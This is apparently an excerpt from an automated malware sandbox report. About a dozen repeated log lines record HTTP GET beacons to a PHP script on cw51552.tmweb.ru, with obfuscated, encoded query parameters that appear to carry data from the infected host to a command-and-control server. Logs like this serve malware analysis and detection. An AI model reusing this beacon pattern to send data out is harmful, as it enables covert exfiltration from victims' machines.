Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIyV2Zh5WYNBSbhJ3ZvJHUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
Source: global traffic	HTTP traffic detected: GET /pythonlowupdateprotectdefault.php?ZCtANymCdQ5AwX4I4P2pLKRFxU93uZ=gAoP&AcVLy3x7M3GdCGzKs9=PvnM2ztSDLZAHHWHc4r0RWT23&0fabc1eaec57cb0bb1ef74f13993d618=iNWN3EjM1gDMhlDZyQGNiVDZ0cTN1YWYhJDM2YzYzQ2YwEzY4QmYlVzMxAzM2ETOyAzN1cTM&c01989751a368db0cb0d8cfc3a15fd41=AO5QzYmZ2MmRzNjZmNkFWMjVWZwEGM1UTMldjNlVGOkFTYmNWN5UjM&dde10c4390967701713f53f3b3d5f179=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&1b75f528cf1d148aff9416eb1a112e93=gN0YWY5U2N5ImYkR2NyADZiRmY4cjZjVWMmhTY4UGMjZmY3Y2M1MjN&b7f0a4918b7f29e95f6b0984ebfb745a=0nIuVnUiojI39GZul2VUNUQiwiIZJiOi4WatRWQzlmIsIiTiojItF2YiV2VzlmIsISWiojIl52boB3byNWaNNXaiwiIiojIHFEViwiI0lmQgQjNg8mcQBCMxAyc39GZul2ViojIyVmVul2ViwSfigGd1F2Zul2czlWbvw1bp5ybm5Wawl2Lc9CX6MHc0RHaiojIl1GZhVmciwiIoNWayVnWvwVZw9mc1VkI6ISZu9mel1Wa0JCLiUDMwgjI6ICbhR3cvBnIsICZlRXatlGTgAXbhNWY0FGRggjNwAjNTFkI6IyZy9mIsICMwUTNugDL3YjNz4yN0IiOiM2bsJCLig0QiojI5JHduV3bjJCLig2YpJXdaJiOi42bpdWZyJCLig2YpJHvCP4waJiOikHdpNmIsISbvNmL3cjbkNmL5cTLyUTL3ETL0gTLu5WdiojIl1WYuR3cvhmIsISO34iM14yNx4CN4IiOiAXaisnOi8mZulEcJJCLiMXZu9maiojIl1WYOJXZzVlIsIyNycDOzEjI6ISZtFmTDBlIsISNuAjL0IiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&ba8ed416cf1847cc6ec318d947d4293e=QNwIDZ4cTO2MTOmRGN4UjN3ETNmVzMiFGM2ETYjhDZ3AzNiJzNmBjY&eec40d31c2a2e9ab0d843abaabfa189b=ANkBTNwYDMldDZhJjMyEjNmhTY2UWY4ATYzUGNwQWMmFzNzQTY2IDN HTTP/1.1Accept: /Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1Host: cw51552.tmweb.ru
